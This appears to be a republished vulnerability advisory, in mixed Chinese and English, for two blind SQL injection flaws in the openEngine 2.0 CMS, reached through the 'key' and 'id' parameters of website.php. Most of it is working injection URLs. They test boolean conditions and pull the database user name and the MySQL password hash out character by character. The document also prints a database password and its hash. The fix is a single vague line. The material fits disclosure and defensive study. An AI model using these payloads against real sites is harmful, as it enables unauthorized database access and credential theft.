标题:openEngine 2.0 'key' Blind SQL Injection vulnerability 作者: Stefan Schurtz 影响程序:Successfully tested on openEngine 2.0 100226 开发者: http://HdhCmsTestopenengine.de/ 概述: ========================== The 'key' parameter in openEngine 2.0 is prone to a Blind SQL Injection ================== 技术分析 ================== # Database信息 User: easy # 盲注: http://HdhCmsTest2cto测试数据 /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=2 -> "Sie m?chten die Seite versenden." http://HdhCmsTest2cto测试数据 /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=1 -> "Sie m?chten die Seite Homepage (de) versenden." # User-Guessing http://HdhCmsTest2cto测试数据 /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101 http://HdhCmsTest2cto测试数据 /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97 http://HdhCmsTest2cto测试数据 /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115 http://HdhCmsTest2cto测试数据 /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121 ========= 解决方案: ========= 针对性修复及过滤 标题: openEngine 2.0 'id' Blind SQL Injection 概述: ========================== openEngine 2.0 含盲注缺陷 ================== 技术分析: ================== Database information User: easy Password: easy (Hash: *E8F5FAE73EBB89AE362C59646600DDCD35EAD7E0) Blind SQL Injection http://HdhCmsTest2cto测试数据 /openengine/cms/website.php?id=/de/sendpage.htm') AND 1=1 AND ('a'='a&key= <- error http://HdhCmsTest2cto测试数据 /openengine/cms/website.php?id=/de/sendpage.htm') AND 1=0 AND ('a'='a&key= <- no error User-Guessing http://HdhCmsTest2cto测试数据 /openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101 AND ('a'='a <- error (e) http://HdhCmsTest2cto测试数据 /openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97 AND ('a'='a <- error (a) http://HdhCmsTest2cto测试数据 /openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115 AND ('a'='a <- error (s) http://HdhCmsTest2cto测试数据 /openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121 AND ('a'='a <- error (y) Password(Hash)-Guessing http://HdhCmsTest2cto测试数据 /openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),1,1)) = 42 AND ('a'='a <- error (*) http://HdhCmsTest2cto测试数据 /openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),2,1)) = 69 AND ('a'='a <- error (E) http://HdhCmsTest2cto测试数据 /openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM mysql .user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),3,1)) = 56 AND ('a'='a <- error (8) ... and so on ========= Solution: ========= 针对性修复及过滤
查看更多关于openEngine 2.0多个盲注缺陷及修复 - 网站安全 - 自学的详细内容...